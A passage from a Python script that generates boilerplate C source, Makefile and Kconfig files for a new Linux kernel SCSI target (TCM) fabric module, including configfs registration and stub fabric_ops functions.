buf += " struct target_fabric_configfs *tf,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + ";\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n\n"
buf += " /* if (" + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n\n"
buf += " " + fabric_mod_port + " = kzalloc(sizeof(struct " + fabric_mod_name + "_" + fabric_mod_port + "), GFP_KERNEL);\n"
buf += " if (!(" + fabric_mod_port + ")) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_" + fabric_mod_port + "\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " " + fabric_mod_port + "->" + fabric_mod_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&" + fabric_mod_port + "->" + fabric_mod_port + "_name[0], " + fabric_mod_name.upper() + "__NAMELEN, wwpn); */\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_wwn;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_" + fabric_mod_port + "(struct se_wwn *wwn)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n"
buf += " kfree(" + fabric_mod_port + ");\n"
buf += "}\n\n"
buf += "static ssize_t " + fabric_mod_name + "_wwn_show_attr_version(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " char *page)\n"
buf += "{\n"
buf += " return sprintf(page, \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \"on \"UTS_RELEASE\"\\n\", " + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += "}\n\n"
buf += "TF_WWN_ATTR_RO(" + fabric_mod_name + ", version);\n\n"
buf += "static struct configfs_attribute *" + fabric_mod_name + "_wwn_attrs[] = {\n"
buf += " &" + fabric_mod_name + "_wwn_version.attr,\n"
buf += " NULL,\n"
buf += "};\n\n"
buf += "static struct target_core_fabric_ops " + fabric_mod_name + "_ops = {\n"
buf += " .get_fabric_name = " + fabric_mod_name + "_get_fabric_name,\n"
buf += " .get_fabric_proto_ident = " + fabric_mod_name + "_get_fabric_proto_ident,\n"
buf += " .tpg_get_wwn = " + fabric_mod_name + "_get_fabric_wwn,\n"
buf += " .tpg_get_tag = " + fabric_mod_name + "_get_tag,\n"
buf += " .tpg_get_default_depth = " + fabric_mod_name + "_get_default_depth,\n"
buf += " .tpg_get_pr_transport_id = " + fabric_mod_name + "_get_pr_transport_id,\n"
buf += " .tpg_get_pr_transport_id_len = " + fabric_mod_name + "_get_pr_transport_id_len,\n"
buf += " .tpg_parse_pr_out_transport_id = " + fabric_mod_name + "_parse_pr_out_transport_id,\n"
buf += " .tpg_check_demo_mode = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_check_demo_mode_cache = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_demo_mode_write_protect = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_prod_mode_write_protect = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_alloc_fabric_acl = " + fabric_mod_name + "_alloc_fabric_acl,\n"
buf += " .tpg_release_fabric_acl = " + fabric_mod_name + "_release_fabric_acl,\n"
buf += " .tpg_get_inst_index = " + fabric_mod_name + "_tpg_get_inst_index,\n"
buf += " .release_cmd_to_pool = " + fabric_mod_name + "_release_cmd,\n"
buf += " .release_cmd_direct = " + fabric_mod_name + "_release_cmd,\n"
buf += " .shutdown_session = " + fabric_mod_name + "_shutdown_session,\n"
buf += " .close_session = " + fabric_mod_name + "_close_session,\n"
buf += " .stop_session = " + fabric_mod_name + "_stop_session,\n"
buf += " .fall_back_to_erl0 = " + fabric_mod_name + "_reset_nexus,\n"
buf += " .sess_logged_in = " + fabric_mod_name + "_sess_logged_in,\n"
buf += " .sess_get_index = " + fabric_mod_name + "_sess_get_index,\n"
buf += " .sess_get_initiator_sid = NULL,\n"
buf += " .write_pending = " + fabric_mod_name + "_write_pending,\n"
buf += " .write_pending_status = " + fabric_mod_name + "_write_pending_status,\n"
buf += " .set_default_node_attributes = " + fabric_mod_name + "_set_default_node_attrs,\n"
buf += " .get_task_tag = " + fabric_mod_name + "_get_task_tag,\n"
buf += " .get_cmd_state = " + fabric_mod_name + "_get_cmd_state,\n"
buf += " .new_cmd_failure = " + fabric_mod_name + "_new_cmd_failure,\n"
buf += " .queue_data_in = " + fabric_mod_name + "_queue_data_in,\n"
buf += " .queue_status = " + fabric_mod_name + "_queue_status,\n"
buf += " .queue_tm_rsp = " + fabric_mod_name + "_queue_tm_rsp,\n"
buf += " .get_fabric_sense_len = " + fabric_mod_name + "_get_fabric_sense_len,\n"
buf += " .set_fabric_sense_len = " + fabric_mod_name + "_set_fabric_sense_len,\n"
buf += " .is_state_remove = " + fabric_mod_name + "_is_state_remove,\n"
buf += " .pack_lun = " + fabric_mod_name + "_pack_lun,\n"
buf += " /*\n"
buf += " * Setup function pointers for generic logic in target_core_fabric_configfs.c\n"
buf += " */\n"
buf += " .fabric_make_wwn = " + fabric_mod_name + "_make_" + fabric_mod_port + ",\n"
buf += " .fabric_drop_wwn = " + fabric_mod_name + "_drop_" + fabric_mod_port + ",\n"
buf += " .fabric_make_tpg = " + fabric_mod_name + "_make_tpg,\n"
buf += " .fabric_drop_tpg = " + fabric_mod_name + "_drop_tpg,\n"
buf += " .fabric_post_link = NULL,\n"
buf += " .fabric_pre_unlink = NULL,\n"
buf += " .fabric_make_np = NULL,\n"
buf += " .fabric_drop_np = NULL,\n"
buf += " .fabric_make_nodeacl = " + fabric_mod_name + "_make_nodeacl,\n"
buf += " .fabric_drop_nodeacl = " + fabric_mod_name + "_drop_nodeacl,\n"
buf += "};\n\n"
buf += "static int " + fabric_mod_name + "_register_configfs(void)\n"
buf += "{\n"
buf += " struct target_fabric_configfs *fabric;\n"
buf += " int ret;\n\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \" on \"UTS_RELEASE\"\\n\"," + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += " /*\n"
buf += " * Register the top level struct config_item_type with TCM core\n"
buf += " */\n"
buf += " fabric = target_fabric_configfs_init(THIS_MODULE, \"" + fabric_mod_name[4:] + "\");\n"
buf += " if (!(fabric)) {\n"
buf += " printk(KERN_ERR \"target_fabric_configfs_init() failed\\n\");\n"
buf += " return -ENOMEM;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Setup fabric->tf_ops from our local " + fabric_mod_name + "_ops\n"
buf += " */\n"
buf += " fabric->tf_ops = " + fabric_mod_name + "_ops;\n"
buf += " /*\n"
buf += " * Setup default attribute lists for various fabric->tf_cit_tmpl\n"
buf += " */\n"
buf += " TF_CIT_TMPL(fabric)->tfc_wwn_cit.ct_attrs = " + fabric_mod_name + "_wwn_attrs;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_attrib_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_param_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_np_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_attrib_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_auth_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_param_cit.ct_attrs = NULL;\n"
buf += " /*\n"
buf += " * Register the fabric for use within TCM\n"
buf += " */\n"
buf += " ret = target_fabric_configfs_register(fabric);\n"
buf += " if (ret < 0) {\n"
buf += " printk(KERN_ERR \"target_fabric_configfs_register() failed\"\n"
buf += " \" for " + fabric_mod_name.upper() + "\\n\");\n"
buf += " return ret;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Setup our local pointer to *fabric\n"
buf += " */\n"
buf += " " + fabric_mod_name + "_fabric_configfs = fabric;\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Set fabric -> " + fabric_mod_name + "_fabric_configfs\\n\");\n"
buf += " return 0;\n"
buf += "};\n\n"
buf += "static void " + fabric_mod_name + "_deregister_configfs(void)\n"
buf += "{\n"
buf += " if (!(" + fabric_mod_name + "_fabric_configfs))\n"
buf += " return;\n\n"
buf += " target_fabric_configfs_deregister(" + fabric_mod_name + "_fabric_configfs);\n"
buf += " " + fabric_mod_name + "_fabric_configfs = NULL;\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Cleared " + fabric_mod_name + "_fabric_configfs\\n\");\n"
buf += "};\n\n"
buf += "static int __init " + fabric_mod_name + "_init(void)\n"
buf += "{\n"
buf += " int ret;\n\n"
buf += " ret = " + fabric_mod_name + "_register_configfs();\n"
buf += " if (ret < 0)\n"
buf += " return ret;\n\n"
buf += " return 0;\n"
buf += "};\n\n"
buf += "static void " + fabric_mod_name + "_exit(void)\n"
buf += "{\n"
buf += " " + fabric_mod_name + "_deregister_configfs();\n"
buf += "};\n\n"
buf += "#ifdef MODULE\n"
buf += "MODULE_DESCRIPTION(\"" + fabric_mod_name.upper() + " series fabric driver\");\n"
buf += "MODULE_LICENSE(\"GPL\");\n"
buf += "module_init(" + fabric_mod_name + "_init);\n"
buf += "module_exit(" + fabric_mod_name + "_exit);\n"
buf += "#endif\n"
try:
p.write(buf)
except IOError:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_scan_fabric_ops(tcm_dir):
fabric_ops_api = tcm_dir + "include/target/target_core_fabric_ops.h"
print "Using tcm_mod_scan_fabric_ops: " + fabric_ops_api
process_fo = 0;
p = open(fabric_ops_api, 'r')
line = p.readline()
while line:
if process_fo == 0 and re.search('struct target_core_fabric_ops {', line):
line = p.readline()
continue
if process_fo == 0:
process_fo = 1;
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
continue
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
p.close()
return
def tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
bufi = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.c"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
fi = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.h"
print "Writing file: " + fi
pi = open(fi, 'w')
if not pi:
tcm_mod_err("Unable to open file: " + fi)
buf = "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/list.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n"
buf += "#include <scsi/scsi.h>\n"
buf += "#include <scsi/scsi_host.h>\n"
buf += "#include <scsi/scsi_device.h>\n"
buf += "#include <scsi/scsi_cmnd.h>\n"
buf += "#include <scsi/libfc.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_transport.h>\n"
buf += "#include <target/target_core_fabric_ops.h>\n"
buf += "#include <target/target_core_fabric_lib.h>\n"
buf += "#include <target/target_core_device.h>\n"
buf += "#include <target/target_core_tpg.h>\n"
buf += "#include <target/target_core_configfs.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "int " + fabric_mod_name + "_check_true(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_true(struct se_portal_group *);\n"
buf += "int " + fabric_mod_name + "_check_false(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_false(struct se_portal_group *);\n"
total_fabric_ops = len(fabric_ops)
i = 0
while i < total_fabric_ops:
fo = fabric_ops[i]
i += 1
# print "fabric_ops: " + fo
if re.search('get_fabric_name', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_name(void)\n"
buf += "{\n"
buf += " return \"" + fabric_mod_name[4:] + "\";\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_name(void);\n"
continue
if re.search('get_fabric_proto_ident', fo):
buf += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " u8 proto_id;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " proto_id = fc_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " proto_id = sas_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " proto_id = iscsi_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return proto_id;\n"
buf += "}\n\n"
bufi += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *);\n"
if re.search('get_wwn', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_name[0];\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *);\n"
if re.search('get_tag', fo):
buf += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " return tpg->" + fabric_mod_port + "_tpgt;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *);\n"
if re.search('get_default_depth', fo):
buf += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *);\n"
if re.search('get_pr_transport_id\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code,\n"
buf += " unsigned char *buf)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " ret = iscsi_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *, unsigned char *);\n"
if re.search('get_pr_transport_id_len\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " ret = iscsi_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *);\n"
if re.search('parse_pr_out_transport_id\)\(', fo):
buf += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " const char *buf,\n"
buf += " u32 *out_tid_len,\n"
buf += " char **port_nexus_ptr)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " char *tid = NULL;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " tid = fc_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " tid = sas_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " tid = iscsi_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
buf += " }\n\n"
buf += " return tid;\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(struct se_portal_group *,\n"
bufi += " const char *, u32 *, char **);\n"
if re.search('alloc_fabric_acl\)\(', fo):
buf += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n\n"
buf += " nacl = kzalloc(sizeof(struct " + fabric_mod_name + "_nacl), GFP_KERNEL);\n"
buf += " if (!(nacl)) {\n"
buf += " printk(KERN_ERR \"Unable to alocate struct " + fabric_mod_name + "_nacl\\n\");\n"
buf += " return NULL;\n"
buf += " }\n\n"
buf += " return &nacl->se_node_acl;\n"
buf += "}\n\n"
bufi += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *);\n"
if re.search('release_fabric_acl\)\(', fo):
buf += "void " + fabric_mod_name + "_release_fabric_acl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_nacl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_fabric_acl(struct se_portal_group *,\n"
bufi += " struct se_node_acl *);\n"
if re.search('tpg_get_inst_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *);\n"
if re.search('release_cmd_to_pool', fo):
buf += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *);\n"
if re.search('shutdown_session\)\(', fo):
buf += "int " + fabric_mod_name + "_shutdown_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_shutdown_session(struct se_session *);\n"
if re.search('close_session\)\(', fo):
buf += "void " + fabric_mod_name + "_close_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_close_session(struct se_session *);\n"
if re.search('stop_session\)\(', fo):
buf += "void " + fabric_mod_name + "_stop_session(struct se_session *se_sess, int sess_sleep , int conn_sleep)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_stop_session(struct se_session *, int, int);\n"
if re.search('fall_back_to_erl0\)\(', fo):
buf += "void " + fabric_mod_name + "_reset_nexus(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_reset_nexus(struct se_session *);\n"
if re.search('sess_logged_in\)\(', fo):
buf += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *);\n"
if re.search('sess_get_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *);\n"
if re.search('write_pending\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending(struct se_cmd *);\n"
if re.search('write_pending_status\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *);\n"
if re.search('set_default_node_attributes\)\(', fo):
buf += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *nacl)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *);\n"
if re.search('get_task_tag\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *);\n"
if re.search('get_cmd_state\)\(', fo):
buf += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *);\n"
if re.search('new_cmd_failure\)\(', fo):
buf += "void " + fabric_mod_name + "_new_cmd_failure(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_new_cmd_failure(struct se_cmd *);\n"
if re.search('queue_data_in\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *);\n"
if re.search('queue_status\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_status(struct se_cmd *);\n"
if re.search('queue_tm_rsp\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *);\n"
if re.search('get_fabric_sense_len\)\(', fo):
buf += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void);\n"
if re.search('set_fabric_sense_len\)\(', fo):
buf += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *se_cmd, u32 sense_length)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *, u32);\n"
if re.search('is_state_remove\)\(', fo):
buf += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *);\n"
if re.search('pack_lun\)\(', fo):
buf += "u64 " + fabric_mod_name + "_pack_lun(unsigned int lun)\n"
buf += "{\n"
buf += " WARN_ON(lun >= 256);\n"
buf += " /* Caller wants this byte-swapped */\n"
buf += " return cpu_to_le64((lun & 0xff) << 8);\n"
buf += "}\n\n"
bufi += "u64 " + fabric_mod_name + "_pack_lun(unsigned int);\n"
try:
p.write(buf)
except IOError:
tcm_mod_err("Unable to write f: " + f)
p.close()
try:
pi.write(bufi)
except IOError:
tcm_mod_err("Unable to write fi: " + fi)
pi.close()
return
def tcm_mod_build_kbuild(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Makefile"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf += fabric_mod_name + "-objs := " + fabric_mod_name + "_fabric.o \\\n"
buf += " " + fabric_mod_name + "_configfs.o\n"
buf += "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name + ".o\n"
try:
p.write(buf)
except IOError:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_build_kconfig(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Kconfig"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "config " + fabric_mod_name.upper() + "\n"
buf += " tristate \"" + fabric_mod_name.upper() + " fabric module\"\n"
buf += " depends on TARGET_CORE && CONFIGFS_FS\n"
buf += " default n\n"
buf += " ---help---\n"
buf += " Say Y here to enable the " + fabric_mod_name.upper() + " fabric module\n"
try:
p.write(buf)
except IOError:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_add_kbuild(tcm_dir, fabric_mod_name):
buf = "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name.lower() + "/\n"
kbuild = tcm_dir + "/drivers/target/Makefile"
f = open(kbuild, 'a')
f.write(buf)
f.close()
return
def tcm_mod_add_kconfig(tcm_dir, fabric_mod_name):
buf = "source \"drivers/target/" + fabric_mod_name.lower() + "/Kconfig\"\n"
kconfig = tcm_dir + "/drivers/target/Kconfig"
f = open(kconfig, 'a')
f.write(buf)
f.close()
return
def main(modname, proto_ident):
# proto_ident = "FC"
# proto_ident = "SAS"
# proto_ident = "iSCSI"
tcm_dir = os.getcwd();
tcm_dir += "/../../"
print "tcm_dir: " + tcm_dir
fabric_mod_name = modname
fabric_mod_dir = tcm_dir + "drivers/target/" + fabric_mod_name
print "Set fabric_mod_name: " + fabric_mod_name
